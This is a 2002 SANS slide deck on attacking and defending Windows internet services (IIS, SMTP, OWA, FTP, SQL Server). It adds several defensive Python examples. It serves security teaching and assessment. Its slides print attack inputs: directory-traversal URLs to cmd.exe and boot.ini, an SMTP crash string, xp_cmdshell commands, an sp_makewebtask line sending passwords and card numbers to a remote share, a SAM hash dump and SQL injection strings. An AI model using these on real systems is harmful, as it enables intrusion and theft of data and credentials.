Slide 1: SMASHING WINDOWS
Attacking and Defending Windows Internet Services
H D Moore, Digital Defense Inc.

Slide 2: Introduction
SANS 2002
• H D Moore
  – Senior Analyst at Digital Defense
  – 5 years experience penetration testing
  – Contact: [email protected]
• Digital Defense
  – Founded January 2000
  – Provide recurring assessment services
  – Specialize in financial industry

Slide 3: Agenda
– Quick Overview
– Internet Information Server
– Microsoft SMTP Service
– Outlook Web Access
– Microsoft FTP Service
– Microsoft SQL Server
– Demos / Questions

Slide 4: Quick Overview
• Why should you sit through this?
  – Learn how crackers get in
  – Learn how to assess your own systems
  – See why network worms are so effective
  – Demonstrate why a patch needs to be applied
  – Actually verify that a patch worked
  – Check new software for related problems

Slide 5: Quick Overview
• Why bother with assessing Windows?
  – Over 30% of all web sites run on Windows
  – Popular online banking and e-commerce platform
  – Incredibly easy to install and start using
  – Most services have insecure default settings
  – Isn’t it secure with patches? Just wait a week…

Slide 6: IIS – Internet Information Server
(a.k.a. Incredibly Insecure System)

Slide 7: IIS – Security Overview
• What is IIS?
  – Microsoft’s Web Server Product
  – Standard component of Windows 2000+
  – Aims to be easy to use and extend
  – Horrible security architecture
  – Most features are enabled by default
  – Every version to date has been vulnerable to a remote shell granting attack in its default configuration.

Slide 8: IIS – Usage
• Where is IIS used?
  – Corporate Web Sites
  – E-Commerce Sites
  – Online Banking Systems
  – Intranet/Internal Sites
  – With other products
    • Sendmail for Windows
  – Various “appliances”
    • Cisco VOIP systems

Slide 9: IIS – Usage
• Why is it used?
  – Provided with the operating system
  – Very user-friendly configuration
  – Large number of ASP/CF developers
  – Huge feature set, easy to extend
  – Integrates with a Windows network
  – Decent performance by comparison

Slide 10: IIS – Vulnerabilities
• Three Primary Sources of Vulnerabilities
  – ISAPI Extensions
    • Code Red Worm
  – Sample Scripts
    • RDS Exploit
  – IIS Core
    • ::$DATA
    • Unicode
    • Double Decode

Slide 11: IIS – ISAPI Extensions
• What is an ISAPI extension?
  – Adds functionality to IIS
  – Usually in the form of a DLL
  – ASP, CFML, PHP are extensions
  – Usually tied to a specific suffix (.asp, .ida)
• Types of security problems
  – Buffer Overflows
  – Information Disclosure

Slide 12: IIS – ISAPI Extensions
• Why are they such a security risk?
  – Code is not as well reviewed as core IIS
  – Extensions are enabled by default
  – Extension code can execute as SYSTEM
• Where are the extensions shown?
  – Open Internet Services Manager
  – Select Web Site -> Properties
  – Home Directory -> Configuration

Slide 13: IIS – ISAPI Extensions
Extension Configuration

Slide 14: IIS – ISAPI Vulnerabilities
• Remote Code Execution
  – Overflow in ISM.dll (.htr)
    • Overflow in URL at ~3000 bytes
    • Exploit code was released 2 years ago
    • Only affects pre-SP6 IIS 4.0 servers
  – Overflow in IDQ.dll (.idq)
    • Overflow in Host header at ~220 bytes
    • “Code Red” used this to propagate
    • Affects both IIS 4.0 and 5.0

Slide 15: IIS – ISAPI Vulnerabilities
• Remote Code Execution
  – Overflow in MSW3PRT.dll (.printer)
    • Overflow is in the Host: header at ~240 bytes
    • Exploit code in wide circulation and very effective
    • Affects Windows 2000 / IIS 5.0 only
  – Overflow in ActiveState PerlIIS.dll (.plx)
    • Overflow in URL at ~340 bytes
    • Exploit code in circulation
    • Affects ActiveState Perl 5.6.1 < build 630

Slide 16: IIS – ISAPI Vulnerabilities
• Information Disclosure
  – Source disclosure with ISM.dll (.htr)
    • http://server/somescript.asp+.htr
    • http://server/somescript.asp?(%20 * 230).htr
  – Source disclosure with WEBHITS.dll (.htw)
    • http://server/null.htw?CiWebHitsFile=/default.asp%20

Slide 17: IIS – ISAPI Vulnerabilities
• Information Disclosure
  – Physical path disclosure in IDQ.dll (.idq)
    • http://server/nonexistent.idq
    • http://server/nonexistent.ida
  – Physical path disclosure in HTTPODBC.dll (.idc)
    • http://server/nonexistent.idc

Slide 18: IIS – ISAPI Solutions
• Remove Everything! (almost)
  – There are only a few extensions most people actually need: .asp, .asa, .shtml, .shtm.
  – Extensions like .php and .cfml are usually ok provided that they are at the latest patch level.

Slide 19: IIS – ISAPI Solutions

Slide 20: IIS – ISAPI Solutions

Slide 21: IIS – Sample Scripts
• The problem with sample scripts
  – Demonstrate possibly dangerous features
  – Included as part of a default install
  – Have absolutely no access control
  – Unaffected by service packs and hotfixes
  – Often located on a different volume and added as a virtual directory, allowing other vulnerabilities to be further exploited.

Slide 22: IIS – Sample Scripts
• Vulnerabilities in Sample Scripts
  – View Arbitrary Files
    • Multiple ShowCode.asp scripts
  – Remote Database Access
    • The infamous /MSADC/msadcs.dll (RDS)
    • adctest.exe, mkilog.exe, ctss.idc
  – Guess/Change User Accounts
    • All the scripts in /IISADMPWD/
  – Network Tunnels
    • Port relaying via /rpc/rpcproxy.dll

Slide 23: IIS – Sample Scripts

Slide 24: IIS – Sample Scripts
• Sample Scripts - Solution
  – Actually delete sample files
  – Remove the Virtual Directories
  – Select “Custom Install” next time

Slide 25: IIS – Core
• What problems exist in the core server?
  – File System Quirks
  – “Translate: f” Bug
  – Directory Traversal
  – IIS WebDav Features

Slide 26: IIS – Core
• File System Quirks
  – DOS 8.3 File Names – Bypass IIS ACLs
    • Affects pre-SP6 IIS 4.0
    • http://server/protected/ becomes http://server/protec~1/
  – NTFS File Streams – Access Source
    • Affects pre-SP6 IIS 4.0
    • http://server/login.asp::$DATA

Slide 27: IIS – Core
• “Translate: f” Bug
  – Retrieve the source of any file on the server:
      GET /global.asa\ HTTP/1.0
      Translate: f
  – Affects Windows 2000 pre-SP1 only

Slide 28: IIS – Core
• What is Directory Traversal?
  – Most file systems use two special directory names to refer to the current and parent directory.
  – A single period “.” refers to the current directory.
  – A double period “..” refers to the directory above.
  – Directory traversal bugs are dependent on these special directory names to access files outside of the defined root directory.

Slide 29: IIS – Core
• Directory Traversal – Win9x “…”
  – Windows 9x supports multiple-dot parent paths
    • http://server/……………/autoexec.bat
    • http://server/……/windows/command.com?echo+hello
  – Works on Win9x machines running IIS or PWS
  – Other web servers on Win9x have been vulnerable

Slide 30: IIS – Core
• Directory Traversal – UNICODE
  – Windows supports a two-byte character encoding system called “UNICODE”.
  – Alternate character sets can be used to make web requests by requesting their hexified values
  – The “/” and “\” characters can be represented with their UNICODE counterparts and older IIS versions will allow requests UNDER the web root.
  – Affects IIS 4.0 and IIS 5.0
  – Other web servers may be affected

Slide 31: IIS – Core
• Directory Traversal – UNICODE
  – Example: (%c0%af = “/”)
    • http://server/..%c0%af..%c0%af../boot.ini
  – Number of variations depends on installed langs
  – Possible to execute \winnt\system32\cmd.exe
  – Exploited by many different worms
  – Very popular exploit among “kids”

Slide 32: IIS – Core
• Directory Traversal – Double Decode
  – Requests for files in an executable directory are hex-decoded twice and the final result is not checked for parent paths.
  – Example:
    • %25 = “%” AND %5c = “\”
    • Request: http://server/scripts/..%255c../
    • First Decode: http://server/scripts/..%5c../
    • Second Decode: http://server/scripts/..\../
  – IIS 3.0, 4.0, 5.0 are affected
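As an added example (not from the slides), the Python below models why the ordering "decode once, check for parent paths, then decode and convert again" fails against both the %c0%af request on the previous slide and the %255c request on this one, next to a resolver that canonicalises first and checks last. WEB_ROOT and the request paths are constructed, and the lenient UTF-8 decoder is a model of the behaviour, not IIS code.

```python
# Added example (not from the SANS 2002 slides). Models the "decode, check,
# decode again" ordering behind the Unicode (%c0%af) and double-decode (%255c)
# traversal bugs, beside a resolver that canonicalises first and checks last.
# WEB_ROOT and the request paths are constructed for the example.
import posixpath
import re

WEB_ROOT = "/inetpub/wwwroot"  # assumed document root (POSIX form for portability)

def pct_decode(raw: bytes) -> bytes:
    """One pass of %XX decoding over raw bytes; malformed escapes are left alone."""
    return re.sub(rb"%([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), raw)

def lenient_utf8(raw: bytes) -> str:
    """Model of a lenient decoder that accepts overlong two-byte sequences, so
    C0 AF becomes '/' instead of being rejected; everything else is Latin-1."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)

def flawed_resolve(url_path: str) -> str:
    """Flawed order: decode once, look for '..' segments, then decode again and
    map to the file system. Both bypasses slip past the check unrecognised."""
    once = pct_decode(url_path.encode("ascii"))
    if any(seg == b".." for seg in re.split(rb"[/\\]", once)):
        raise PermissionError("parent path rejected")       # a plain /../ is caught
    fs = lenient_utf8(pct_decode(once)).replace("\\", "/")  # too late: %5c and C0 AF become separators
    return posixpath.normpath(WEB_ROOT + fs)

def safe_resolve(url_path: str) -> str:
    """Hardened order: decode exactly once, decode UTF-8 strictly (overlong
    sequences raise), fold separators, normalise, and only then check that the
    result is still under WEB_ROOT. Nothing is decoded after the check."""
    try:
        text = pct_decode(url_path.encode("ascii")).decode("utf-8")
    except UnicodeDecodeError as exc:
        raise PermissionError(f"invalid UTF-8 in path: {exc.reason}") from exc
    fs = posixpath.normpath(WEB_ROOT + "/" + text.replace("\\", "/").lstrip("/"))
    if fs != WEB_ROOT and not fs.startswith(WEB_ROOT + "/"):
        raise PermissionError("resolved path leaves the web root")
    return fs

if __name__ == "__main__":
    for req in ("/..%c0%af..%c0%af../boot.ini", "/scripts/..%255c../", "/default.asp"):
        for name, fn in (("flawed", flawed_resolve), ("safe", safe_resolve)):
            try:
                print(f"{name:6} {req:32} -> {fn(req)}")
            except PermissionError as e:
                print(f"{name:6} {req:32} -> rejected ({e})")
```

With the flawed order both slide requests resolve outside WEB_ROOT; with the hardened order the %c0%af request is rejected as invalid UTF-8 and the %255c request resolves to a literal "..%5c.." name that stays under the root.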

Slide 33: IIS – Core

Slide 34: IIS – Core
• IIS WebDav Features
  – DAV is Distributed Authoring and Versioning
  – WebDav provides content mgmt via HTTP
  – WebDav is accessed as HTTP methods
  – XML used for complex requests
  – A “normal” web request:
      GET / HTTP/1.0
  – A WebDav request:
      PUT /newpage.html HTTP/1.0

Slide 35: IIS – Core
• IIS WebDav Features
  – OPTIONS
    • OPTIONS / HTTP/1.0
    • Returns a list of allowed HTTP methods
    • Methods in Allow: are accessible
  – SEARCH
    • Able to retrieve a directory listing through XML

Slide 36: IIS – Core
• IIS WebDav Features
  – PUT
    • Common among misconfigured IIS 4.0 servers
    • Allows direct file uploads via WebDav (FrontPage)
  – DELETE
    • Common among misconfigured IIS 4.0 servers
    • Allows deletion of any file in the web root

Slide 37: IIS – Core
• IIS WebDav Features
  – MOVE
    • Common among misconfigured IIS 4.0 servers
    • Allows you to move any file or directory
  – MKDIR/MKCOL
    • Only found on machines with really bad permissions
    • Allows creation of directories

Slide 38: IIS – Core
• IIS WebDav Features
  – COPY
    • Most servers allow this, but it rarely works
    • COPY / HTTP/1.0
      Destination: http://nuthaserver/newdir/
  – PROPFIND
    • Allowed by default
    • Needs XML input to do anything interesting
    • Various DoS attacks with long args to this command
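The OPTIONS check from slide 35, applied to the write methods the last four slides describe, as an added example that is not part of the original deck: it reads the Allow: header of an OPTIONS reply and reports which of PUT, DELETE, MOVE, COPY and MKCOL the server still advertises, so an administrator can confirm a permissions change took effect. SAMPLE_RESPONSE is constructed, and audit_live() is a hypothetical helper for a server you administer.

```python
# Added example (not from the SANS 2002 slides): audit the Allow: header of an
# OPTIONS reply for the WebDAV write methods the slides flag as dangerous.
# SAMPLE_RESPONSE is constructed, not captured from a real host.
import http.client
from typing import Dict, List

# Methods the slides single out when a misconfigured server exposes them
WRITE_METHODS = ("PUT", "DELETE", "MOVE", "COPY", "MKCOL")

def parse_headers(raw_response: str) -> Dict[str, str]:
    """Lower-cased header name -> value for a raw HTTP response (status line skipped)."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def methods_from_allow(allow_value: str) -> List[str]:
    """Split 'Allow: A, B, C' into upper-cased method names, server order kept."""
    return [m.strip().upper() for m in allow_value.split(",") if m.strip()]

def exposed_write_methods(allow_value: str) -> List[str]:
    """Subset of the advertised methods that let a client change content."""
    return [m for m in methods_from_allow(allow_value) if m in WRITE_METHODS]

def audit_response(raw_response: str) -> List[str]:
    """Exposed write methods from a captured or constructed OPTIONS response."""
    return exposed_write_methods(parse_headers(raw_response).get("allow", ""))

def audit_live(host: str, port: int = 80, path: str = "/") -> List[str]:
    """Hypothetical helper: send OPTIONS <path> to a server you administer."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    try:
        conn.request("OPTIONS", path)
        return exposed_write_methods(conn.getresponse().getheader("Allow") or "")
    finally:
        conn.close()

SAMPLE_RESPONSE = (  # constructed; shaped like an IIS 5.0 reply to "OPTIONS / HTTP/1.0"
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    exposed = audit_response(SAMPLE_RESPONSE)
    print("write methods advertised:", ", ".join(exposed) or "none")
```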

Slide 39: IIS – Summary
• A remote compromise is practically guaranteed by the number of vulnerabilities in a default installation.
• Microsoft’s “feature push” strategy to encourage upgrades ensures there will always be new vulnerabilities.
• The amount of effort, knowledge, and time required to effectively secure an IIS server means that only experienced, security-aware administrators have a chance of succeeding.
• Microsoft is making attempts to simplify the assessment and patching process by releasing free security tools.

Slide 40: IIS – Questions?

Slide 41: IMS – Microsoft Internet Mail Service
“I send you this file in order to have your advice” – Sircam Worm

Slide 42: IMS – Security Overview
• What is IMS?
  – IMS supports the Simple Mail Transfer Protocol
  – Part of Windows NT 4.0 Option Pack
  – Comes standard with Windows 2000
  – Aims to be easy to use and configure
  – Often overlooked when it comes to security

Slide 43: IMS – Security Overview
• What problems exist?
  – Unauthorized Mail Relaying
  – Denial of Service Attacks
  – Information Gathering

Slide 44: IMS – Vulnerabilities
• Unauthorized Mail Relaying
  – Misconfigured Mail Servers
    • Verify that relaying is turned off or at least properly configured
  – Windows 2000 SMTP Auth Bypass
    • AUTH GSSAPI

Slide 45: IMS – Vulnerabilities
• Denial of Service Attacks
  – IMS + Exchange 5.5 Empty Character Set
    • Email with: charset = “”
  – Windows 2000 BDAT/AUTH Crash
    • BDAT 4\r\nb00mAUTH LOGIN\r\n\r\n\r\n\r\n

Slide 46: SMTP – Vulnerabilities
• Information Gathering
  – “Bounce” messages can contain sensitive information about a company’s internal network and domain
  – The AUTH and XAUTH commands can be used to brute-force user accounts through SMTP

Slide 47: SMTP – Summary
• Many SMTP servers are misconfigured or buggy in a way that allows spam relaying.
• The SMTP service can be used to gather sensitive information about a network.
• While a few DoS conditions exist, newer versions of Windows automatically restart a crashed service.

Slide 48: SMTP – Questions?

Slide 49: OWA – Microsoft Outlook Web Access
(The CEO wants WHAT installed?)

Slide 50: OWA – Security Overview
• What is Outlook Web Access?
  – Web mail client for Microsoft Exchange
  – Runs on top of IIS 4.0 or 5.0
  – Emulates the Outlook interface
  – Written in ASP, uses COM+ objects

Slide 51: OWA – Security Overview
• What problems exist?
  – All IIS vulnerabilities apply
  – Defaults to clear text HTTP transport
  – Anonymous access enabled by default
  – Allows exploitation of client-side bugs

Slide 52: OWA – Vulnerabilities
• OWA runs on IIS
  – Many people forget to include OWA machines when applying patches to their “web servers”
  – Crackers and worms don’t care what it is, as long as it’s running the IIS web server
  – Cracking the OWA machine provides full access to login and mail ASP scripts

Slide 53: OWA – Vulnerabilities
• Defaults to Clear Text
  – Many people run OWA across regular HTTP, allowing their login and email to be easily sniffed
  – Enabling SSL is not too difficult, provided you know how to configure SSL under IIS.

Slide 54: OWA – Vulnerabilities
• Anonymous Access by Default
  – A default install allows full access to the Global Address List to unauthenticated users
  – “Public Folders” are exactly that, viewable by anyone able to access the server

Slide 55: OWA – Vulnerabilities
• Exploitation of Client Side Bugs
  – It is possible to embed a hostile application into an email message and force it to run when a user reads their email via Internet Explorer
  – There are various “Cross Site Scripting” issues with OWA which could allow someone to read any cookies or email contents

Slide 56: OWA – Summary
• Outlook Web Access is a fairly dangerous application to maintain just to provide access to email over the web.
• The actual OWA scripts have been proven to be pretty solid; most of the issues are with the underlying IIS server or the default config.
• If you do run OWA, please stay on top of IIS patches, disable anonymous access, and keep sensitive information out of “Public Folders”.

Slide 57: OWA – Questions?

Slide 58: FTP – The Microsoft FTP Service
“So that’s how we do Bill Pay…”

Slide 59: FTP – Security Overview
• What is the FTP service?
  – The File Transfer Protocol
  – THE method of transmitting stored files
  – Part of Windows NT 4.0 Option Pack
  – Comes standard with Windows 2000
  – Easy to configure and use

Slide 60: FTP – Security Overview
• What problems exist?
  – Unencrypted login and transfer
  – Anonymous access by default
  – Predictable PASV port selection
  – SITE STATS information leak
  – STAT Globbing Attack

Slide 61: FTP – Vulnerabilities
• Unencrypted login and transfer
  – Authentication information is sent in clear text and is trivial to capture
  – The actual file transfers are unencrypted and easy to sniff and extract

Slide 62: FTP – Vulnerabilities
• Anonymous Access by Default
  – The default installation allows access using the standard “anonymous” and “ftp” accounts
  – Systems with bad permissions for the FTP root are automatically turned into warez servers for the various pirate groups

Slide 63: FTP – Vulnerabilities
• Predictable PASV Port
  – FTP uses one connection from the client to port 21 on the server as the “control” port
  – Directory listings and file transfers are done via a second connection
  – Active FTP uses a connection from the server to the client
  – Passive FTP opens a port on the server and the client connects to it

Slide 64: FTP – Vulnerabilities
• Predictable PASV Port
  – Many FTP servers use single-incrementing port numbers for the “passive” data port
  – With MS FTP 4.0, it is possible to guess the next data port and steal another user’s file transfer
  – With MS FTP 5.0, a hijack attempt will just disconnect and the client’s FTP session becomes unusable
  – Automated tools exist to exploit this

Slide 65: FTP – Vulnerabilities
• SITE STATS Information Leak
  – The SITE STATS feature shows how many times each FTP command has been executed
  – An anonymous user can profile an FTP server to determine when other users are logging on
  – The statistics can reveal what privileged commands are being executed and at what time
  – Usage profiles can be used in conjunction with the PASV port attack to steal scheduled transfers

Slide 66: FTP – Vulnerabilities
• SITE STATS Information Leak
  – Sample output from ftp.XiXroXoXt.com
      DELE : 19993
      MKD  : 12260
      RETR : 4157300
      STOR : 34736
      USER : 5829438
      PASS : 5792087

Slide 67: FTP – Vulnerabilities
• STAT Globbing Attack
  – MS notified early Dec.
  – No fix available yet
  – MS FTP 4.0 and 5.0 vulnerable
  – Crashes ALL IIS services
    • STAT *?
  – Possibly exploitable

Slide 68: FTP – Summary
• The FTP protocol was never designed with security in mind.
• The secondary data channel does not require authentication and is trivial to hijack.
• If you must run FTP, please encrypt AND sign your files before transferring.

Slide 69: FTP – Questions?

Slide 70: MSSQL – Microsoft SQL Server
(Where did your data go today?)

Slide 71: MSSQL – Security Overview
• What is SQL Server?
  – Microsoft’s relational database product
  – Originally based on the Sybase engine
  – Often installed with other products
  – Ships by default on many vendor machines
  – “Personal” editions exist for client systems
  – Popular backend for web applications
    • E-Commerce
    • Financial Services

Slide 72: MSSQL – Security Overview
• Security Issues
  – Service runs as Administrator or SYSTEM
  – Default accounts are the biggest problem
  – SQL User Level Privilege Escalation
  – Service is easily located on the network
  – Dangerous Stored Procedures
  – Syntax optimal for SQL insertion attacks

Slide 73: MSSQL – Vulnerabilities
• Service Runs as Administrator or SYSTEM
  – A compromise of the “sa” account results in full access to the entire system
  – Any bugs in the listening service or query parser could result in a complete system compromise

Slide 74: MSSQL – Vulnerabilities
• Default Accounts are the Biggest Problem
  – The all-powerful “sa” account often has no password set; newer versions try to force it.
  – The “probe” account in 6.5 is unprivileged, but gaining “sa” access is trivial in that version.
  – A network worm appeared in late November 2001, exploiting the default “sa” account and propagating via stored procedures.

Slide 75: MSSQL – Vulnerabilities
• SQL User Level Privilege Escalation
  – SQL 7.0 Trusted Connections
      SELECT * FROM OPENROWSET('SQLOLEDB',
        'Trusted_Connection=Yes;Data Source=myserver',
        'SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"')
  – Buffer overflows in Extended Stored Procedures

Slide 76: MSSQL – Vulnerabilities
• Service is Easily Located on the Network
  – Use the SQLPing utility
  – Use osql -L
  – SQL Server can use these transports:
    • TCP/IP (TCP 1433, UDP 1433, 1434)
    • MS RPC (dynamic ports)
    • Named Pipes
    • IPX/SPX / AppleTalk / Banyan Vines

Slide 77: MSSQL – Vulnerabilities
• Dangerous Stored Procedures
  – The infamous xp_cmdshell
      EXEC master..xp_cmdshell "cmd.exe /c …"
  – Sending query results back to you via SMB
      EXEC master..sp_makewebtask "\\ip\tmp\test.html", "SELECT username, password, cc from users"
  – Dump the SAM password hashes via xp_regread
      EXEC xp_regread HKLM, 'SECURITY\SAM\Domains\Account', 'F'

Slide 78: MSSQL – Vulnerabilities
• Syntax Optimal for SQL Insertion Attacks
  – Queries can be stacked via semi-colon
      SELECT * FROM cats WHERE id = 4; UPDATE USER SET …
  – Comments can be inserted inline
      SELECT * FROM users WHERE user = 'bob';-- ' AND password = "bad password"
  – The engine provides verbose error messages about SQL syntax problems
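The inline-comment query from this slide, as an added example that is not part of the original deck: the login check built by string concatenation beside its parameterised form. SQLite stands in for SQL Server here (both accept the ';' terminator and the '--' comment the slide relies on), and the users table with its one account is constructed.

```python
# Added example (not from the SANS 2002 slides): the slide's login query built
# by string concatenation, beside the parameterised form. SQLite stands in for
# SQL Server; the users table and its single account are constructed.
import sqlite3

def make_db() -> sqlite3.Connection:
    """In-memory users table holding a single constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('bob', 'secret')")
    return conn

def login_concat(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """Vulnerable: input is spliced into the SQL text. A user value of
    bob';--  closes the quote, terminates the statement and comments out
    the password test, exactly as on the slide."""
    sql = ("SELECT * FROM users WHERE user = '" + user +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_param(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """Hardened: values are bound as parameters, so quotes, ';' and '--'
    are data rather than syntax and the password test always runs."""
    sql = "SELECT * FROM users WHERE user = ? AND password = ?"
    return conn.execute(sql, (user, password)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    for fn in (login_concat, login_param):
        print(fn.__name__, "bob/secret:", fn(db, "bob", "secret"),
              "| bob';-- / bad password:", fn(db, "bob';--", "bad password"))
```

The stacked-query trick from the same slide is not reproducible with this driver, because sqlite3's execute() refuses a second statement after the semicolon; the comment trick is enough to show the login bypass.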

Slide 79: MSSQL – Summary
• Compromising the “sa” account is almost always equivalent to having local Administrator access to the SQL Server machine (hint: don’t run a database on your DCs).
• Since SQL Server supports so many different network protocols, a simple packet filter on ports 1433/1434 is usually not enough to restrict access.
• Recent versions of MS-SQL (2k+) are slightly more secure out of the box; the “Typical” install only allows Domain Authentication.

Slide 80: MSSQL – Questions?